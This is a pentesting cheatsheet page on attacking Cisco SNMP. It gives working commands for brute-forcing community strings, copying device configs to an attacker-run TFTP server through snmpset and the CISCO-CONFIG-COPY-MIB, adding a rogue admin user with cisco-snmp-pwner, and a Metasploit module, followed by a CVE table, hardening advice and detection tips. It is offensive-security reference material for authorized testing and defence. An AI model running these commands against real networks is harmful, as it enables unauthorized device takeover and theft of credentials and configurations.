daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

cisco-snmp.md (10339B)


      1 ---
      2 title: "Cisco SNMP"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-snmp/cisco-snmp.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Cisco SNMP
     14 
     15 ## Pentesting Cisco Networks
     16 
     17 **SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**.
     18 
     19 A classic--yet still extremely effective--attack vector is to **brute-force community strings** in order to elevate from unauthenticated user to device administrator (RW community).  
     20 A practical tool for this task is **onesixtyone**:<sup>[[8]](#references)</sup>
     21 
     22 ```bash
     23 onesixtyone -c community_strings.txt -i targets.txt
     24 ```
     25 
     26 Other fast options are the Nmap NSE script `snmp-brute` or Hydra's SNMP module:
     27 
     28 ```bash
     29 nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
     30 hydra -P wordlist.txt -s 161 10.10.10.1 snmp
     31 ```
     32 
     33 For generic OID walking and broader enumeration, see [the main SNMP page](/hacktricks/network-services-pentesting/pentesting-snmp/overview). On Cisco gear, do not stop just because Nmap or Nessus fingerprints the service as `SNMPv3`: pentests routinely find v1/v2c communities and v3 users side by side.
     34 
     35 ### SNMPv3 targets are still worth attacking
     36 If the device only exposes SNMPv3, user enumeration and password guessing are still practical. Once you recover a **RW SNMPv3 user**, the same config-copy MIB can be abused to exfiltrate or merge configurations.<sup>[[2]](#references)</sup>
     37 
     38 ```bash
     39 # Enumerate SNMPv3 usernames / guess passwords
     40 ./snmpwn.rb --hosts targets.txt --users users.txt --passlist passwords.txt --enclist passwords.txt
     41 
     42 # Trigger a Cisco config download over SNMPv3
     43 ./config-dump.py -t 192.168.66.1 -a SHA -A 'AuthPass!' -x AES -X 'PrivPass!' -u netmon -s 10.10.14.8
     44 ```
     45 
     46 ---
     47 
     48 ### Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)
     49 If you obtain an **RW community** or **RW SNMPv3 user**, you can copy the running-config/startup-config to a remote server *without CLI access* by abusing the CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`).<sup>[[1]](#references)[[2]](#references)</sup> Classic IOS workflows usually use **TFTP** (and sometimes **RCP**); **SCP** exists on platforms that support the Secure Copy extension. If you need to stand up or enumerate a TFTP service first, check [69 - UDP TFTP](/hacktricks/network-services-pentesting/69-udp-tftp).
     50 
     51 1. **Nmap NSE - `snmp-ios-config`**
     52 
     53 ```bash
     54 nmap -sU -p161 --script snmp-ios-config \
     55      --script-args creds.snmp=:private,snmp.version=v2c 192.168.66.1
     56 ```
     57 The script automatically orchestrates the copy operation and prints the configuration to stdout.
     58 
     59 2. **Manual `snmpset` sequence**
     60 
     61 ```bash
     62 # Copy running-config (4) to a TFTP server (1) using row id 1234
     63 snmpset -v2c -c private -m +CISCO-CONFIG-COPY-MIB 192.168.66.1 \
     64   ccCopyProtocol.1234 i 1 \
     65   ccCopySourceFileType.1234 i 4 \
     66   ccCopyDestFileType.1234 i 1 \
     67   ccCopyServerAddress.1234 a 10.10.14.8 \
     68   ccCopyFileName.1234 s backup.cfg \
     69   ccCopyEntryRowStatus.1234 i 4
     70 
     71 # Check state / failure cause and then destroy the row
     72 snmpget -v2c -c private -m +CISCO-CONFIG-COPY-MIB 192.168.66.1 \
     73   ccCopyState.1234 ccCopyFailCause.1234
     74 snmpset -v2c -c private -m +CISCO-CONFIG-COPY-MIB 192.168.66.1 \
     75   ccCopyEntryRowStatus.1234 i 6
     76 ```
     77 Row identifiers are *one-shot*; reuse within five minutes triggers `inconsistentValue` errors.
     78 
     79 The important offensive detail is that **`networkFile -> runningConfig` merges** your file into the live configuration, while **`networkFile -> startupConfig` replaces NVRAM** and should only be used with a full config. That makes `runningConfig` the safer path if your goal is to add a local user, enable SSH, loosen `aaa`, or otherwise obtain a management foothold without clobbering the whole device.<sup>[[1]](#references)</sup>
     80 
     81 Recent tooling automates both the dump and the write-back workflow:<sup>[[3]](#references)</sup>
     82 
     83 ```bash
     84 sudo cisco-snmp-pwner dump --listen 10.10.14.8 --target 192.168.66.1 \
     85   --version 2c --communitystring private
     86 
     87 sudo cisco-snmp-pwner add-user --listen 10.10.14.8 --target 192.168.66.1 \
     88   --version 2c --communitystring private \
     89   --username pwned --password 'allYourCisc0AreBelongToUs$'
     90 ```
     91 
     92 ---
     93 
     94 ### Metasploit goodies
     95 
     96 * **`cisco_config_tftp`** - downloads running-config/startup-config via TFTP after abusing the same MIB.<sup>[[2]](#references)</sup>
     97 * **`snmp_enum`** - collects device inventory information, VLANs, interface descriptions, ARP tables, etc.
     98 
     99 ```bash
    100 use auxiliary/scanner/snmp/cisco_config_tftp
    101 set RHOSTS 10.10.100.10
    102 set COMMUNITY private
    103 set OUTPUTDIR /tmp/cisco-configs
    104 run
    105 ```
    106 
    107 ---
    108 
    109 ## Recent Cisco SNMP footguns and vulnerabilities (2024 - 2025)
    110 Keeping track of vendor advisories is useful to scope *zero-day-to-n-day* opportunities inside an engagement. The practical takeaway is that **RO communities and v3 users are still valuable**: they can turn into config theft, unauthorized polling from "blocked" sources, forced reloads, or even RCE if additional privilege is already in play.<sup>[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
    111 
    112 | Year | CVE | Affected feature | Offensive takeaway |
    113 |------|-----|------------------|--------------------|
    114 | 2025 | CVE-2025-20352 | SNMP parser / stack overflow | A crafted SNMP packet can turn a stolen **RO community** or valid **v3 user** into authenticated **DoS** and, on IOS XE with additional admin or privilege 15 credentials, **root RCE**. |
    115 | 2025 | CVE-2025-20169 to CVE-2025-20176 | Multiple SNMP request parsing bugs | Crafted authenticated requests can still force device reloads across SNMP v1/v2c/v3, which matters whenever you only have telemetry credentials and need an outage window. |
    116 | 2025 | CVE-2025-20151 | SNMPv3 configuration persistence | Long `snmp-server user ... access <ACL>` lines can be truncated on reload, leaving the user without the expected ACL and allowing polling from sources that should be denied. |
    117 | 2024 | CVE-2024-20373 | IPv4 ACL handling | **Extended named IPv4 ACLs** can appear attached to SNMP while not being enforced at all. If you already know a community or v3 user, "restricted to NMS only" may be false. |
    118 
    119 Exploitability still depends on possessing the community string or v3 credentials in most cases, which is exactly why brute-forcing, trap harvesting, and config theft remain relevant against Cisco devices.
    120 
    121 ---
    122 
    123 ## Hardening & Detection tips
    124 
    125 * Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVEs above).
    126 * Prefer **SNMPv3** with `authPriv` over v1/v2c. On IOS XE releases that support SHA-2, use `sha-2 256` (or stronger) rather than the older `sha` keyword, which denotes SHA-1; choose the strongest privacy algorithm supported by both the device and the NMS.<sup>[[9]](#references)</sup>
    127   ```
    128   snmp-server group SECURE v3 priv
    129   snmp-server user monitor SECURE v3 auth sha-2 256 <authpass> priv aes 256 <privpass>
    130   ```
    131 * Bind SNMP to a management VRF and restrict it with a supported ACL type. On releases affected by CVE-2024-20373, extended named IPv4 ACLs could be attached but not enforced; patch the device or use a standard named/numbered ACL until it is fixed.<sup>[[7]](#references)</sup>
    132 * If you use SNMPv3 user-level ACLs, validate the serialized `snmp-server user` line after save/reload. Long auth/priv/ACL combinations can exceed the 255-character limit and silently drop the ACL on reboot (CVE-2025-20151). On newer IOS XE releases, re-create those users with type 6 encryption.<sup>[[6]](#references)</sup>
    133 * Disable **RW communities**; if operationally required, limit them with ACL and views:  
    134   `snmp-server community <string> RW 99 view SysView`
    135 * If patching lags behind the 2025 parser bugs, use an SNMP view to exclude the advisory-listed OIDs until the device can be upgraded.
    136 * Monitor for:
    137   - UDP/161 spikes or unexpected sources.
    138   - `CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource` events indicating out-of-band config changes.
    139   - Outbound TFTP/SCP transfers from infrastructure devices that should not be exporting configs.
    140 
    141 ---
    142 
    143 ## References
    144 
    145 - [1] [Cisco: How To Copy Configurations To and From Cisco Devices Using SNMP](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html)
    146 - [2] [TrustedSec: Cisco Hackery - How Cisco Configuration Files Can Help Attackers Enumerate Your Network](https://trustedsec.com/blog/cisco-hackery-configuration-file-download)
    147 - [3] [firefart/cisco-snmp-pwner - Tool to dump Cisco device configs via SNMP and/or add new users](https://github.com/firefart/cisco-snmp-pwner)
    148 - [4] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability (CVE-2025-20352)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte)
    149 - [5] [Cisco Security Advisory: Cisco IOS, IOS XE, and IOS XR Software SNMP Denial of Service Vulnerabilities (CVE-2025-20169 to CVE-2025-20176)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-dos-sdxnSUcW)
    150 - [6] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMPv3 Configuration Restriction Vulnerability (CVE-2025-20151)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmpv3-qKEYvzsy)
    151 - [7] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMP IPv4 Access Control List Bypass Vulnerability (CVE-2024-20373)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-uwBXfqww)
    152 - [8] [Trail of Bits - onesixtyone](https://github.com/trailofbits/onesixtyone)
    153 - [9] [Cisco IOS XE - AES and SHA-2 support for SNMPv3](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/snmp/configuration/xe-17-x/snmp-xe-17-book/nm-snmp-encrypt-snmp-support.html)